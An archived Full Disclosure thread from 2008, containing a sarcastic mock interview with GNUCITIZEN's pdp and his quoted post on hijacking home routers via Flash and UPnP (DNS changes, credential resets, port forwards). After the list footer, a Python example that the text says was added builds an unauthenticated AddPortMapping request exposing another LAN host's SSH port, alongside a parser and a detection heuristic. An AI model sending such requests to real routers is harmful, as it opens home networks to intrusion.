Full Disclosure mailing list archives
Re: Hacking The Interwebs
From: "Fredrick Diggle" <fdiggle () gmail com>
Date: Tue, 15 Jan 2008 10:53:29 -0600
The following is an interview Fred Diggle Security conducted with the great researcher pdp (architect). In it he discloses some of his elite 0day research as well as his thoughts on the future of security and XSS. This should be published in phrack for sure.

fred diggle: Hello to the pdp architect
pdp: what's up bro
fred diggle: have you found the xss lately
pdp: yes many xss bugs
fred diggle: <script>monkey()</script>
pdp: your sarcasm is quite childish and kind of dull really, have you thought about that ? <-- how rude :( [smile]
fred diggle: Fredrick Diggle tries not to think about himself. it is depressing. job at zoo is unrewarding. may i join you as xss finder?
pdp: I don't think that we have a place for you, we only employ the best
fred diggle: Fredrick Diggle is the best google code search reg exer evar though
pdp: [smile] really
pdp: honestly, let's cut the crap, what's up with that on FD? you just need to annoy people or what? I don't get it. u and your other buddies/personas/nicks
fred diggle: actually fred diggle is only one person/nick/etc
pdp: but you are in a group
fred diggle: Fred Diggle Sec is a group but it only posts on FD with the name of founder and leader Fred Diggle. Who else on FD do you believe is Fred Diggle?
pdp: don't know, everybody else that acts like a retard on FD, and who has posted just 3 times, and comments on every single email <-- Or doesn't like pdp research into mad xss 0day
fred diggle: nope those are not Fred Diggle
pdp: I understand your motives to an extent. but what I don't understand is why you bother <-- oh does he?
fred diggle: fred diggle has lots of free time at the zoo
pdp: hah [smile]. so what's up with all that anti XSS thing, I haven't published a single XSS on GNUCITIZEN... it is mostly about how to use XSS as an attack vector
fred diggle: it's just kind of a retarded attack vector generally
pdp: well to an extent yes, but the Web is growing and I truly believe that it will become more important in the future <-- WINNAR!
pdp: have you checked the MacOS update hack. the idea is that when macos updates it pulls some JavaScript which runs in a very relaxed sandbox, therefore attackers can take full control of your PC. JavaScript is a glue language. the reason I talk about it and I research it is because it exists everywhere <-- You heard it here first, disclosure of gnucitizen 0day research vectors o.0
fred diggle: what's the vector of attack
pdp: the vector is that the sandbox provides you with access to write/read and execute files. this is serious enough <-- Super Serial even... man bear pig is a real threat :(
fred diggle: you talking some form of mitm?
pdp: yes, in this case, yes, I am just giving a fresh example though, keep that in mind <-- yay for bullshit
fred diggle: elite!
pdp: yeh and moreover if you control the network to the extent where you can provide arbitrary code to the system then you can do other stuff as well. well JavaScript is everywhere, let me give you an example
pdp: ok JavaScript runs on mobile phones, on every desktop, as WSH or in the Browser <-- XSS is like robots and will eventually destroy us
fred diggle: why focus on the vector?
pdp: JavaScript runs on the server side and under any architecture. I don't focus on one vector, this is just how GNUCITIZEN was born, it was Web oriented at first
fred diggle: you focus on one interpreted language with very limited uses
pdp: well I focus on stuff that no one has researched yet. why bother doing the same as the others <-- 0day ++
fred diggle: if a js hack is the best vector of attack people will use it. That doesn't mean it deserves attention.
pdp: well I don't think that people know what they are doing <-- hear that FD, pdp thinks you are a moron :(
fred diggle: but it's almost never the best vector
pdp: I am not saying that JavaScript is the ultimate tool but it may become. well it depends what you are after <-- soon we will have machines that run on XSS instead of oil
fred diggle: are you after $ from dbags maybe?
pdp: for example if you have a sandboxed browser how will your buffer overflows help you to do something. first of all let's define what attackers are after. most serious attacks are after the data. spending so much time on hacking the client just to get into your data is useless; instead someone can utilize XSS cuz that can definitely get to your ebay account for example. simple <-- gnucitizen will hack your ebay! oh noes!
fred diggle: so you are honestly in this game to protect data? to make the world safer?
pdp: I am not. I like breaking things, not protecting against attacks, but to me the data is the ultimate goal
fred diggle: but it seems to me if you are interested in personal growth and learning you would focus on the more complex aspects of this stuff
pdp: well we do many different things which I cannot talk about yet but that will come with time <-- pdp likes to brag about mad xss 0day etc
fred diggle: everything js can do is fairly obvious just from reading the spec. if you are really interested in breaking things then at least break the interpreter
pdp: well there are ways to break the interpreter and hop sandboxes but why should I talk about that. what I find is that very often people talk about theory, theoretical crap. although the research might look technically challenging why should I publish it unless I have something solid <-- that stuff is hard :( lets leave it to people with brains
fred diggle: why should you ever publish it?
pdp: so what is worth being published?
fred diggle: what's worth me giving up what I have spent hours on to a list of idiots for nothing? hrrm maybe a picture of a carrot
pdp: I like that you are taking all this stuff from the fun side of things... and you are right, it is not worth it
fred diggle: Fred Diggle thinks you just want to be famous
pdp: not really. I love my work man
fred diggle: bah so why be a tool about it, just do it and stop posting bullshit. You don't see the "trolls" on FD posting xss to be famous
pdp: yes, but what do you get out of your joy... ok I must agree that I try to make GNUCITIZEN more popular, but the reason I try to do that is because I am tired of being someone else's pawn as you probably are. so to an extent, the research I am doing is also an escape, a life hack if you like. so yes it is for $ and yes we make a name out of it but the goals are higher. I love the hacker culture first of all, I love it and this is the reason why I do other projects like Hakiri which I hope will work <-- Fredrick Diggle sheds a tear. What a noble guy pdp is. Also he exploits the xss in his life >.<
fred diggle: So how do you hope to get out?
pdp: by giving my best <-- finding all xss in the worlds
fred diggle: I mean what is the "out" for a sec researcher <-- hahahahaha fredrick diggle called pdp a security researcher. lulz
pdp: put it this way. I presume you are a sec researcher
fred diggle: no I work at a zoo
pdp: if I can pay you to do your own research in your own defined time frame, would you like that?
fred diggle: do you really believe that there are people willing to pay for that type of person to do xss? to do anything remotely related to it. the only money in xss is in "app scanning" crap and consulting which means you are either a pawn to big business and ultimately the economy or you are the business trying to survive in the economy and sec is not your focus. there are certainly research jobs out there but without demonstrating an understanding of the whole system... they are all out of your reach
pdp: I don't know why everyone brags about comp arch, it is almost like if you understand the stack you are 1337. why is that?
fred diggle: ultimately what the people hiring for those jobs are looking for is an understanding of the basics. Or just the ability to understand the basics. Which like it or not are low level
pdp: not true
fred diggle: Anyone who has that can learn the higher levels
pdp: what people are looking for is someone who understands the bigger picture and then they can hire anyone to do the low stuff
fred diggle: so you want to be a manager? researchers never understand the big picture
pdp: nope, I like to be on my own with GNUCITIZEN, with Hakiri and everything that I believe in
fred diggle: actually i should say don't need to
pdp: they do, it depends what you research
fred diggle: if that's the sort of research you enjoy then be an economist and look at trends in the sec industry, it's the same crap
pdp: no, social scientist is better
fred diggle: fine then do that <-- just stop posting to the intarwebs
pdp: but why should I do that when I know something else already and I like doing it. maybe in 50 years we all go into politics <-- hahahahahaha pdp for govnuh
fred diggle: to address what you said earlier. when did you get the impression that we worship that sort of drivel
pdp: I get the idea that people in the sec research circles value everything that is related to how low system architecture works and abolish everything that is at level 7 or ring 3, pick
fred diggle: nah that is a misunderstanding
pdp: it is true
fred diggle: I value things that are new and innovative. exploiting a buffer overflow of a stack variable is generally neither
pdp: XSS is kind of new and can get very innovative, to an extent that you never know what has happened, but you don't value it because you don't like that it is not asm. think about it for a second: the browser and every other JavaScript/whatever sandbox restricts you from doing things, so when you make it do what you want don't you think this is innovative?
fred diggle: cite me some time when you made the javascript interpreter do something it wasn't supposed to?
pdp: you cannot look at it from the interpreter point of view because underneath the interpreter is the OS or the APP to be more precise, so in that case you rely on the same old exploiting software techniques. you can make the interpreter crash or whatever and with that gain control over the process. this is fine <-- hard stuff again, pdp doesn't like the hard stuff that you can't read in documentation
fred diggle: if it's a blind strcpy in a js interpreter it won't hold my interest
pdp: well the interpreter is not like Python and Ruby, it is really bare. it doesn't even have functionalities, it is just the developer that decides what the interpreter should have. for example, let's say that you want to get out of a sandbox, maybe the typical stuff you have in firefox. the sandbox has only 3 functions usually in XPCOM: dump, debug and importFunction. none of them are useful in whatever way and you are really locked. one way to get out of the sandbox is to return a value which has a bit of sugar. the sugar looks like this {valueOf: function () {whatever}}. if there is an object outside the sandbox which compares the return value to 1 or something else you might be able to overwrite strings outside of the sandbox which may influence the execution path. in firefox for example you don't have only one sandbox, you have layers of sandboxes, so it does get quite interesting when it comes to stuff like this
fred diggle: so what I see is one piece of mildly interesting information that could some day maybe be useful in some very specific part of a very specific exploit
pdp: yes but this is what JS is... it is a domain specific platform. the things that work in Firefox may not work in PDF and will be completely different from WSH, so it is not that you learn just how x86 works, every single platform is different. JavaScript is just a glue language, really, but I am also tired of talking about it <-- thank god
fred diggle: so stop. that's a good solution <-- PLEASE!
pdp: well there are tons of people that find all this stuff very valuable so I keep doing it because there are more developments
fred diggle: anyway fredrick diggle needs to go clean up after the hippopotamus <-- can you guess who the hippo is?

On Jan 13, 2008 2:25 AM, pdp (architect) <pdp.gnucitizen () googlemail com> wrote:
http://www.gnucitizen.org/blog/hacking-the-interwebs

When the victim visits a malicious SWF file, a 4 step ATTACK will silently execute in the background. At that moment the attacker will have control over their router, pretty much regardless of its model. Many of the home routers are vulnerable to this attack as many of them support UPnP to one degree or another.

The attack does not rely on any bugs. Simply put, when two completely legitimate technologies, Flash and UPnP, are combined together, they compose a vulnerability, which exposes many home networks to a great risk.

The attack depends on the fact that most, if not all, routers are UPnP enabled. The UPnP SOAP service can be accessed without authorization over the default Web Admin Interface. With the help of Flash, the attacker can send arbitrary SOAP messages to the router's UPnP control point and as such reconfigure the device in order to enable further attacks.

The most malicious of all malicious things to do when a device is compromised via the attack described in the link pointed at the top of this email, is to change the primary DNS server. That will effectively turn the router and the network it controls into a zombie which the attacker can take advantage of whenever they feel like it. It is also possible to reset the admin credentials and create the sort of onion routing network all bad guys want.

Many routers come with Layer3 portforwarding UPnP service. This is also a potential vector that attackers can use. In cases like this, they will simply expose ports behind the router on the Internet facing side.

We hope that by exposing this information, we will drastically improve the situation for the future. I think that this is a lot better than keeping it for ourselves or risking it all by giving the criminals the opportunity to have in their possession a secret which no one else is aware of.

The best way to protect against this attack is to turn off UPnP if your router's Admin Interface allows it. It seems that many routers simply do not have this feature.

More information on related UPnP research can be found here:
http://www.gnucitizen.org/
http://www.gnucitizen.org/blog/steal-his-wi-fi
http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub-5
http://www.gnucitizen.org/blog/hacking-with-upnp-universal-plug-and-play

GNUCITIZEN is a Cutting Edge, Ethical Hacker Outfit, Information Think Tank, which primarily deals with all aspects of the art of hacking. Our work has been featured in established magazines and information portals, such as Wired, Eweek, The Register, PC Week, IDG, BBC and many others. The members of the GNUCITIZEN group are well known and well established experts in the Information Security, Black Public Relations (PR) Industries and Hacker Circles with widely recognized experience in the government and corporate sectors and the open source community.

GNUCITIZEN is an ethical, white-hat organization that doesn't hide anything. We strongly believe that knowledge belongs to everyone and we do everything to ensure that our readers have access to the latest cutting-edge research and get alerted of the newest security threats when they come. Our experience shows that the best way of protection is mass information. And we mean that literally!!! It is in the public's best interest to make our findings accessible to the vast majority of people, simply because it is proven that the more people know about a certain problem, the better.

--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
http://www.hakiri.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
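The SOAP half of the attack pdp's quoted post describes, as an added example that is not part of the original post and is not GNUCITIZEN's code: it builds the WANIPConnection AddPortMapping request a malicious page would aim at the router's UPnP control point, parses such a request back out of raw HTTP the way a LAN monitor or proxy would, and flags mappings that open a hole to a machine other than the one that asked for it. The router address, control URL, hosts and ports are constructed sample values (a real router publishes its control URL in its device description XML), and the "other host" rule at the end is a heuristic assumed by this example, not anything in the UPnP specification.

```python
# Added example: UPnP IGD AddPortMapping builder, parser and a simple audit check.
# Not from the original post. Control URL and addresses are constructed samples.
import ipaddress
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WANIP = "urn:schemas-upnp-org:service:WANIPConnection:1"


def soap_envelope(action: str, args: dict, service: str = WANIP) -> str:
    """Wrap a UPnP action and its New* arguments in a SOAP 1.1 envelope."""
    body = "".join(f"<New{k}>{escape(str(v))}</New{k}>" for k, v in args.items())
    return (
        '<?xml version="1.0"?>'
        f'<s:Envelope xmlns:s="{SOAP_NS}" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        f'<s:Body><u:{action} xmlns:u="{service}">{body}</u:{action}></s:Body>'
        "</s:Envelope>"
    )


def add_port_mapping_request(router: str, control_url: str, external_port: int,
                             internal_client: str, internal_port: int,
                             protocol: str = "TCP", description: str = "svc") -> bytes:
    """Full HTTP POST for WANIPConnection#AddPortMapping.

    Nothing in it carries credentials: the router accepts it from any LAN
    client, which is exactly what the post above relies on. The SOAPAction
    header is mandatory on UPnP control messages, so a monitor can key on it."""
    envelope = soap_envelope("AddPortMapping", {
        "RemoteHost": "",
        "ExternalPort": external_port,
        "Protocol": protocol,
        "InternalPort": internal_port,
        "InternalClient": internal_client,
        "Enabled": 1,
        "PortMappingDescription": description,
        "LeaseDuration": 0,
    })
    headers = [
        f"POST {control_url} HTTP/1.1",
        f"Host: {router}",
        'Content-Type: text/xml; charset="utf-8"',
        f'SOAPAction: "{WANIP}#AddPortMapping"',
        f"Content-Length: {len(envelope.encode())}",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n" + envelope).encode()


def parse_soap_request(raw: bytes):
    """Return (service, action, args) for a raw UPnP control request, or None.

    The service URN and action come from the SOAPAction header; the argument
    values are read from the matching element inside the SOAP body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    m = re.search(rb'(?im)^SOAPAction:\s*"?([^"#\r\n]+)#([^"\r\n]+)"?', head)
    if not m:
        return None
    service, action = m.group(1).decode(), m.group(2).decode()
    root = ET.fromstring(body)
    call = root.find(f"{{{SOAP_NS}}}Body/{{{service}}}{action}")
    if call is None:
        return None
    args = {}
    for child in call:
        name = child.tag[3:] if child.tag.startswith("New") else child.tag
        args[name] = child.text or ""
    return service, action, args


def mapping_exposes_other_host(args: dict, requester: str) -> bool:
    """Heuristic assumed by this example (not a UPnP rule): a mapping created
    by one LAN client that points at a *different* private address is what a
    browser-driven attacker produces when opening a hole to a neighbour."""
    target = ipaddress.ip_address(args.get("InternalClient", "0.0.0.0"))
    return target.is_private and str(target) != requester and args.get("Enabled") == "1"


if __name__ == "__main__":
    # Constructed sample: the browser on 192.168.1.10 asks the router to
    # expose port 22 of 192.168.1.20 as external port 4444.
    req = add_port_mapping_request("192.168.1.1", "/upnp/control/WANIPConn1",
                                   4444, "192.168.1.20", 22)
    print(req.decode())
    svc, act, a = parse_soap_request(req)
    print(act, a["ExternalPort"], "->", a["InternalClient"], a["InternalPort"])
    print("exposes another host:", mapping_exposes_other_host(a, "192.168.1.10"))
```

SSDP discovery on 1900/udp and the fetch of the device description are left out; the lesson is in the request itself, which needs no session, cookie or password, so nothing short of disabling UPnP at the router (or dropping LAN-originated POSTs carrying a SOAPAction header at a filtering proxy) stops it.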
Current thread:
- Hacking The Interwebs pdp (architect) (Jan 13)
- Re: Hacking The Interwebs Fredrick Diggle (Jan 15)
- Re: Hacking The Interwebs Ed Carp (Jan 15)
- Re: Hacking The Interwebs reepex (Jan 15)
- Re: Hacking The Interwebs Fredrick Diggle (Jan 15)